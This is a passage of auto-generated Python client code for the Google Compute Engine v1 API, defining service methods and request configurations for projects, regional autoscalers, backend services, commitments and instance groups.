method_id=u'compute.projects.moveDisk',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/moveDisk',
request_field=u'diskMoveRequest',
request_type_name=u'ComputeProjectsMoveDiskRequest',
response_type_name=u'Operation',
supports_download=False,
)
def MoveInstance(self, request, global_params=None):
"""Moves an instance and its attached persistent disks from one zone to another.
Args:
request: (ComputeProjectsMoveInstanceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('MoveInstance')
return self._RunMethod(
config, request, global_params=global_params)
MoveInstance.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.moveInstance',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/moveInstance',
request_field=u'instanceMoveRequest',
request_type_name=u'ComputeProjectsMoveInstanceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetCommonInstanceMetadata(self, request, global_params=None):
"""Sets metadata common to all instances within the specified project using the data included in the request.
Args:
request: (ComputeProjectsSetCommonInstanceMetadataRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetCommonInstanceMetadata')
return self._RunMethod(
config, request, global_params=global_params)
SetCommonInstanceMetadata.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.setCommonInstanceMetadata',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/setCommonInstanceMetadata',
request_field=u'metadata',
request_type_name=u'ComputeProjectsSetCommonInstanceMetadataRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetUsageExportBucket(self, request, global_params=None):
"""Enables the usage export feature and sets the usage export bucket where reports are stored. If you provide an empty request body using this method, the usage export feature will be disabled.
Args:
request: (ComputeProjectsSetUsageExportBucketRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetUsageExportBucket')
return self._RunMethod(
config, request, global_params=global_params)
SetUsageExportBucket.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.setUsageExportBucket',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/setUsageExportBucket',
request_field=u'usageExportLocation',
request_type_name=u'ComputeProjectsSetUsageExportBucketRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionAutoscalersService(base_api.BaseApiService):
"""Service class for the regionAutoscalers resource."""
_NAME = u'regionAutoscalers'
def __init__(self, client):
super(ComputeV1.RegionAutoscalersService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified autoscaler.
Args:
request: (ComputeRegionAutoscalersDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionAutoscalers.delete',
ordered_params=[u'project', u'region', u'autoscaler'],
path_params=[u'autoscaler', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/autoscalers/{autoscaler}',
request_field='',
request_type_name=u'ComputeRegionAutoscalersDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified autoscaler.
Args:
request: (ComputeRegionAutoscalersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Autoscaler) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionAutoscalers.get',
ordered_params=[u'project', u'region', u'autoscaler'],
path_params=[u'autoscaler', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/autoscalers/{autoscaler}',
request_field='',
request_type_name=u'ComputeRegionAutoscalersGetRequest',
response_type_name=u'Autoscaler',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeRegionAutoscalersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionAutoscalers.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscaler',
request_type_name=u'ComputeRegionAutoscalersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of autoscalers contained within the specified region.
Args:
request: (ComputeRegionAutoscalersListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionAutoscalerList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionAutoscalers.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field='',
request_type_name=u'ComputeRegionAutoscalersListRequest',
response_type_name=u'RegionAutoscalerList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeRegionAutoscalersPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.regionAutoscalers.patch',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'autoscaler'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeRegionAutoscalersPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeRegionAutoscalersUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.regionAutoscalers.update',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'autoscaler'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscalerResource',
request_type_name=u'ComputeRegionAutoscalersUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionBackendServicesService(base_api.BaseApiService):
"""Service class for the regionBackendServices resource."""
_NAME = u'regionBackendServices'
def __init__(self, client):
super(ComputeV1.RegionBackendServicesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified regional BackendService resource.
Args:
request: (ComputeRegionBackendServicesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionBackendServices.delete',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field='',
request_type_name=u'ComputeRegionBackendServicesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified regional BackendService resource.
Args:
request: (ComputeRegionBackendServicesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendService) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionBackendServices.get',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field='',
request_type_name=u'ComputeRegionBackendServicesGetRequest',
response_type_name=u'BackendService',
supports_download=False,
)
def GetHealth(self, request, global_params=None):
"""Gets the most recent health check results for this regional BackendService.
Args:
request: (ComputeRegionBackendServicesGetHealthRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceGroupHealth) The response message.
"""
config = self.GetMethodConfig('GetHealth')
return self._RunMethod(
config, request, global_params=global_params)
GetHealth.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionBackendServices.getHealth',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}/getHealth',
request_field=u'resourceGroupReference',
request_type_name=u'ComputeRegionBackendServicesGetHealthRequest',
response_type_name=u'BackendServiceGroupHealth',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a regional BackendService resource in the specified project using the data included in the request. There are several restrictions and guidelines to keep in mind when creating a regional backend service. Read Restrictions and Guidelines for more information.
Args:
request: (ComputeRegionBackendServicesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionBackendServices.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices',
request_field=u'backendService',
request_type_name=u'ComputeRegionBackendServicesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of regional BackendService resources available to the specified project in the given region.
Args:
request: (ComputeRegionBackendServicesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(BackendServiceList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionBackendServices.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/backendServices',
request_field='',
request_type_name=u'ComputeRegionBackendServicesListRequest',
response_type_name=u'BackendServiceList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates the specified regional BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeRegionBackendServicesPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.regionBackendServices.patch',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field=u'backendServiceResource',
request_type_name=u'ComputeRegionBackendServicesPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified regional BackendService resource with the data included in the request. There are several restrictions and guidelines to keep in mind when updating a backend service. Read Restrictions and Guidelines for more information.
Args:
request: (ComputeRegionBackendServicesUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.regionBackendServices.update',
ordered_params=[u'project', u'region', u'backendService'],
path_params=[u'backendService', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/backendServices/{backendService}',
request_field=u'backendServiceResource',
request_type_name=u'ComputeRegionBackendServicesUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionCommitmentsService(base_api.BaseApiService):
"""Service class for the regionCommitments resource."""
_NAME = u'regionCommitments'
def __init__(self, client):
super(ComputeV1.RegionCommitmentsService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of commitments.
Args:
request: (ComputeRegionCommitmentsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(CommitmentAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionCommitments.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/commitments',
request_field='',
request_type_name=u'ComputeRegionCommitmentsAggregatedListRequest',
response_type_name=u'CommitmentAggregatedList',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified commitment resource. Get a list of available commitments by making a list() request.
Args:
request: (ComputeRegionCommitmentsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Commitment) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionCommitments.get',
ordered_params=[u'project', u'region', u'commitment'],
path_params=[u'commitment', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/commitments/{commitment}',
request_field='',
request_type_name=u'ComputeRegionCommitmentsGetRequest',
response_type_name=u'Commitment',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a commitment in the specified project using the data included in the request.
Args:
request: (ComputeRegionCommitmentsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionCommitments.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/commitments',
request_field=u'commitment',
request_type_name=u'ComputeRegionCommitmentsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of commitments contained within the specified region.
Args:
request: (ComputeRegionCommitmentsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(CommitmentList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionCommitments.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/commitments',
request_field='',
request_type_name=u'ComputeRegionCommitmentsListRequest',
response_type_name=u'CommitmentList',
supports_download=False,
)
class RegionInstanceGroupManagersService(base_api.BaseApiService):
"""Service class for the regionInstanceGroupManagers resource."""
_NAME = u'regionInstanceGroupManagers'
def __init__(self, client):
super(ComputeV1.RegionInstanceGroupManagersService, self).__init__(client)
self._upload_configs = {
}
def AbandonInstances(self, request, global_params=None):
"""Schedules a group action to remove the specified instances from the managed instance group. Abandoning an instance does not delete the instance, but it does remove the instance from any target pools that are applied by the managed instance group. This method reduces the targetSize of the managed instance group by the number of instances that you abandon. This operation is marked as DONE when the action is scheduled even if the instances have not yet been removed from the group. You must separately verify the status of the abandoning action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeRegionInstanceGroupManagersAbandonInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AbandonInstances')
return self._RunMethod(
config, request, global_params=global_params)
AbandonInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.abandonInstances',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/abandonInstances',
request_field=u'regionInstanceGroupManagersAbandonInstancesRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersAbandonInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified managed instance group and all of the instances in that group.
Args:
request: (ComputeRegionInstanceGroupManagersDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionInstanceGroupManagers.delete',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupManagersDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DeleteInstances(self, request, global_params=None):
"""Schedules a group action to delete the specified instances in the managed instance group. The instances are also removed from any target pools of which they were a member. This method reduces the targetSize of the managed instance group by the number of instances that you delete. This operation is marked as DONE when the action is scheduled even if the instances are still being deleted. You must separately verify the status of the deleting action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeRegionInstanceGroupManagersDeleteInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DeleteInstances')
return self._RunMethod(
config, request, global_params=global_params)
DeleteInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.deleteInstances',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/deleteInstances',
request_field=u'regionInstanceGroupManagersDeleteInstancesRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersDeleteInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns all of the details about the specified managed instance group.
Args:
request: (ComputeRegionInstanceGroupManagersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupManager) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionInstanceGroupManagers.get',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupManagersGetRequest',
response_type_name=u'InstanceGroupManager',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a managed instance group using the information that you specify in the request. After the group is created, it schedules an action to create instances in the group using the specified instance template. This operation is marked as DONE when the group is created even if the instances in the group have not yet been created. You must separately verify the status of the individual instances with the listmanagedinstances method.
A regional managed instance group can contain up to 2000 instances.
Args:
request: (ComputeRegionInstanceGroupManagersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers',
request_field=u'instanceGroupManager',
request_type_name=u'ComputeRegionInstanceGroupManagersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of managed instance groups that are contained within the specified region.
Args:
request: (ComputeRegionInstanceGroupManagersListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionInstanceGroupManagerList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionInstanceGroupManagers.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupManagersListRequest',
response_type_name=u'RegionInstanceGroupManagerList',
supports_download=False,
)
def ListManagedInstances(self, request, global_params=None):
"""Lists the instances in the managed instance group and instances that are scheduled to be created. The list includes any current actions that the group has scheduled for its instances.
Args:
request: (ComputeRegionInstanceGroupManagersListManagedInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionInstanceGroupManagersListInstancesResponse) The response message.
"""
config = self.GetMethodConfig('ListManagedInstances')
return self._RunMethod(
config, request, global_params=global_params)
ListManagedInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.listManagedInstances',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/listManagedInstances',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupManagersListManagedInstancesRequest',
response_type_name=u'RegionInstanceGroupManagersListInstancesResponse',
supports_download=False,
)
def RecreateInstances(self, request, global_params=None):
"""Schedules a group action to recreate the specified instances in the managed instance group. The instances are deleted and recreated using the current instance template for the managed instance group. This operation is marked as DONE when the action is scheduled even if the instances have not yet been recreated. You must separately verify the status of the recreating action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeRegionInstanceGroupManagersRecreateInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RecreateInstances')
return self._RunMethod(
config, request, global_params=global_params)
RecreateInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.recreateInstances',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/recreateInstances',
request_field=u'regionInstanceGroupManagersRecreateRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersRecreateInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Resize(self, request, global_params=None):
"""Changes the intended size for the managed instance group. If you increase the size, the group schedules actions to create new instances using the current instance template. If you decrease the size, the group schedules delete actions on one or more instances. The resize operation is marked DONE when the resize actions are scheduled even if the group has not yet added or deleted any instances. You must separately verify the status of the creating or deleting actions with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
Args:
request: (ComputeRegionInstanceGroupManagersResizeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Resize')
return self._RunMethod(
config, request, global_params=global_params)
Resize.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.resize',
ordered_params=[u'project', u'region', u'instanceGroupManager', u'size'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[u'size'],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/resize',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupManagersResizeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetInstanceTemplate(self, request, global_params=None):
"""Sets the instance template to use when creating new instances or recreating instances in this group. Existing instances are not affected.
Args:
request: (ComputeRegionInstanceGroupManagersSetInstanceTemplateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetInstanceTemplate')
return self._RunMethod(
config, request, global_params=global_params)
SetInstanceTemplate.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.setInstanceTemplate',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/setInstanceTemplate',
request_field=u'regionInstanceGroupManagersSetTemplateRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersSetInstanceTemplateRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetTargetPools(self, request, global_params=None):
"""Modifies the target pools to which all new instances in this group are assigned. Existing instances in the group are not affected.
Args:
request: (ComputeRegionInstanceGroupManagersSetTargetPoolsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetTargetPools')
return self._RunMethod(
config, request, global_params=global_params)
SetTargetPools.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroupManagers.setTargetPools',
ordered_params=[u'project', u'region', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroupManagers/{instanceGroupManager}/setTargetPools',
request_field=u'regionInstanceGroupManagersSetTargetPoolsRequest',
request_type_name=u'ComputeRegionInstanceGroupManagersSetTargetPoolsRequest',
response_type_name=u'Operation',
supports_download=False,
)
class RegionInstanceGroupsService(base_api.BaseApiService):
"""Service class for the regionInstanceGroups resource."""
_NAME = u'regionInstanceGroups'
def __init__(self, client):
super(ComputeV1.RegionInstanceGroupsService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Returns the specified instance group resource.
Args:
request: (ComputeRegionInstanceGroupsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroup) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionInstanceGroups.get',
ordered_params=[u'project', u'region', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupsGetRequest',
response_type_name=u'InstanceGroup',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of instance group resources contained within the specified region.
Args:
request: (ComputeRegionInstanceGroupsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionInstanceGroupList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionInstanceGroups.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/instanceGroups',
request_field='',
request_type_name=u'ComputeRegionInstanceGroupsListRequest',
response_type_name=u'RegionInstanceGroupList',
supports_download=False,
)
def ListInstances(self, request, global_params=None):
"""Lists the instances in the specified instance group and displays information about the named ports. Depending on the specified options, this method can list all instances or only the instances that are running.
Args:
request: (ComputeRegionInstanceGroupsListInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionInstanceGroupsListInstances) The response message.
"""
config = self.GetMethodConfig('ListInstances')
return self._RunMethod(
config, request, global_params=global_params)
ListInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionInstanceGroups.listInstances',
ordered_params=[u'project', u'region', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/instanceGroups/{instanceGroup}/listInstances',
request_field=u'regionInstanceGroupsListInstancesRequest',
request_type_name=u'ComputeRegionInstanceGroupsListInstancesRequest',
response_type_name=u'RegionInstanceGroupsListInstances',
supports_download=False,
)
def SetNamedPorts(self, request, global_params=None):
"""Sets the named ports for the specified regional instance group.
Args:
request: (ComputeRegionInstanceGroupsSetNamedPortsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
